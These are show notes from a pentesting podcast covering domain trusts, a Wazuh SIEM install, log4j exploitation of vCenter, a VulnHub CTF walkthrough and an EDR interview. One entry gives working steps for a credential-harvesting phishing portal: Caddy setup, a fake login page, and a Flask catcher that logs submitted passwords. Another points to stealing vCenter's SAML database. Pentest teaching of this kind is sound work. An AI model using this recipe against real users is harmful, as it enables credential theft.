7MS #371: Tales of Internal Pentest Pwnage - Part 4

In today's tale of pwnage, we'll talk about how domain trusts can be dangerous because they have...well...trust issues.

11 Aug 202317min

Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server! Here's a quick set of install commands for Ubuntu: sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list sudo apt update sudo apt install caddy -y Create an empty directory for your new site, and then create a file called Caddyfile. If all you want is a simple static site (and you've already pointed DNS for yourdomain.com to your Ubuntu droplet, just put the domain name in the Caddyfile: domain.com Then type sudo caddy run - and that's it! You'll serve up a blank site with lovely HTTPS goodness! If you want to get more fancy, make a index.html with a basic phishing portal: Your rad awesome eyeball cool phishing portal! body { background-image: url("https://tangent.town/static/background.jpg"); background-repeat:no-repeat; background-size:cover; } User Name: Password: Unauthorized use is prohibited! This will now be served when you visit domain.com. However, Caddy doesn't (to my knowledge) have a way to handle POST requests. In other words, it doesn't have the ability to log usernames and passwords people put in your phishing portal. One of our pals from Slack asked ChatGPT about it and was offered this separate Python code to run as a POST catcher: from flask import Flask, request app = Flask(__name__) @app.route('/capture', methods=['POST']) def capture(): print(request.form) return 'OK', 200 if __name__ == '__main__': app.run(host='0.0.0.0', port=5000) If you don't have Flask installed, do this: sudo apt install python3-pip -y sudo pip install Flask Run this file in one session, then in your index.html file make a small tweak in the form action directive: Try sending creds through your phishing portal again, and you will see they are now logged in your Python POST catcher!

4 Aug 202329min

Today we had a blast playing with Wazuh as a SIEM you can use for work and/or home. Inspiration for this episode came from Network Chuck. This one-liner will literally get Wazuh installed in about 5 minutes: curl -sO https://packages.wazuh.com/4.4/wazuh-install.sh && sudo bash ./wazuh-install.sh -a P.S. if you accidentally close your command window before writing down the admin password (like I did), you can use this command to retrieve it: sudo tar -O -xvf wazuh-install-files.tar wazuh-install-files/wazuh-passwords.txt Once Wazuh is installed, I recommend going to Management > Configuration > Edit Configuration, look for a section that starts with  and change no to yes. Also, before you start deploying agents, I recommend making some groups for them, which I believe has to be done at the command line: /var/ossec/bin/agent_groups -a -g windows-boxes -q /var/ossec/bin/agent_groups -a -g linux -q From there you should be ready to start rockin' some agent installs. Have fun!

31 Juli 202350min

Oooo, giggidy! Today's tale of pentest pwnage is about pwning vCenter with CVE-2021-44228 - a vulnerability that lets us bypass authentication entirely and do/take what we want from vCenter! Key links to make the magic happen: How to exploit log4j manually in vCenter How to automate the attack! Tool to steal the SAML database you extract from vCenter

21 Juli 202322min

Today me and my pal Paul from Project7 did a live hacking session and finally got the Callahan Auto brake pad Web app back online! Hopefully you enjoyed this hacking series. The feedback has been great, so we may have to take a crack at Billy in the near future as well.

17 Juli 202331min

Hey friends, today we're continuing our series on pwning the Tommy Boy VM on VulnHub VM! P.S. did you miss part one? Check it out on YouTube. Joe "The Machine" Skeen and I had a blast poking and prodding at the VM in hopes to fix the broken Callahan Auto brake-ordering Web app. Some tips/tricks we cover: It's always a good idea to look at a site's robots.txt file crunch is awesome for making wordlists fcrackzip is rad for cracking encrypted zip files dirbuster works well for busting into hidden files and subfolders exiftool works well to pull metadata out of images

7 Juli 202337min

Today I'm excited to share a featured interview with our new friend Mike Toole of Blumira. We talk about all things EDR, including: How does it differ from something like Windows Defender? What things do I need to keep in mind if I'm in the market for an EDR purchase? Is Mac EDR any good? How do attackers bypass EDR? Will AI create industructible malware, take over the human race and then use our bodies for batteries?

30 Juni 20231h

Holy schnikes - this episode is actually 7 minutes long! What a concept! Anyway, today I give you a couple tips that have helped me pwn some internal networks the last few weeks, including: Getting a second (and third?) opinion on Active Directory Certificate Services vulnerabilities! Analyzing the root domain object in BloodHound to find some misconfigs that might equal instant domain admin access!

16 Juni 20237min